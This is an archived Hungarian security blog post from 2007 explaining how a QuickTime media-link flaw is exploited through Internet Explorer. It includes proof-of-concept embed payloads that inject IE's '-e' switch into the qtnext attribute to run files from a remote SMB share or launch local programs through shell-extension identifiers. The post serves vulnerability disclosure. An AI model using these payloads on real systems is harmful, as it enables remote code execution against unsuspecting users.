Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

QuickTime üti Explorert

2007.09.20. 18:27 | buherator | Szólj hozzá!

Azoknak akiknek esetleg nem lett volna világos, hogy miért is kellene a QuickTime-ot javítani egy hiba következtében, amely Firefoxon keresztül használható ki, most íme ugyanannak a hibának a kihasználása Internet Explorer alatt (köszönjük meg szépen Thor Larholmnak):

A hiba kihasználása gyakorlatilag ugyanúgy történik mint a Firefox esetében, néhány apróbb módosítással, de bizonyos szempontból még egyszerűbben. Explorer alatt az embed XML element qtnext attribútuma kell hogy tartalmazzon egy kettőspontot, különben a megadott kifejezéshez automaikusan hozzácsapódik egy "http://" előtag, ami ugyebár elrontja a játékot. De ne essünk pánikba, a megoldáshoz elég megnézni az Internet Explorer lehetséges parancssori argumentumait:

-k
Kiosk Mode
-extoff
No Add-ons Mode
-embedding
Application started via OLE Automation, causes IE to start with no chrome or any other UI.
-nohome
Skip display of home page (best used with URI argument)
-slf
Load home page from cache
-e
Explorer mode with split pane view


Minket a -e érdekel, melynek használatával úgy indíthatjuk el a böngészőt, mintha közvetlenül az explorer.exe-t hívnánk. Így pedig bármilyen külső fájlt elindíthatunk:

<embed src=”presentation.mov” autoplay=”true” qtnext=”-e file:////servername/sharename”/>

Ez az `iexplore.exe -e file:////servername/sharename` parancs futtatásával lesz egyenértékű. Ez persze nem működik, ha az SMB kéréseket megfogja a tűzfal, viszont vegyük észre, hogy innentől kezdve távolról tudunk helyi hibákat használni!

Larholm ezen kívül egy másik lehetőséget is bemutat, mégpedig a helyi programok regisztrált Shell Extensionként történő futtatását:

<?xml version=”1.0″>
<?quicktime type=”application/x-quicktime-media-link”?>
<embed src=”a.mp3″ autoplay=”true” qtnext=”-e ::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}”/>

A Shell Extensionök arra valók, hogy bizonyos objektumtípusokon végzett hagyományos műveleteket egyéni lehetőségekkel egészítsünk ki, a fennti kód egyszerűen elindítja a NetMeetinget, annek regisztrált Shell Extensionjén keresztül. Nem midnen programhoz tartozik ilyen kiterjesztés, ezért a lehetőségek száma ebben az esetben korlátozott. Azért itt vannak a PoC kódok:

NetMeeting
Vezérlőpult
System32

Címkék: internet explorer quicktime

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.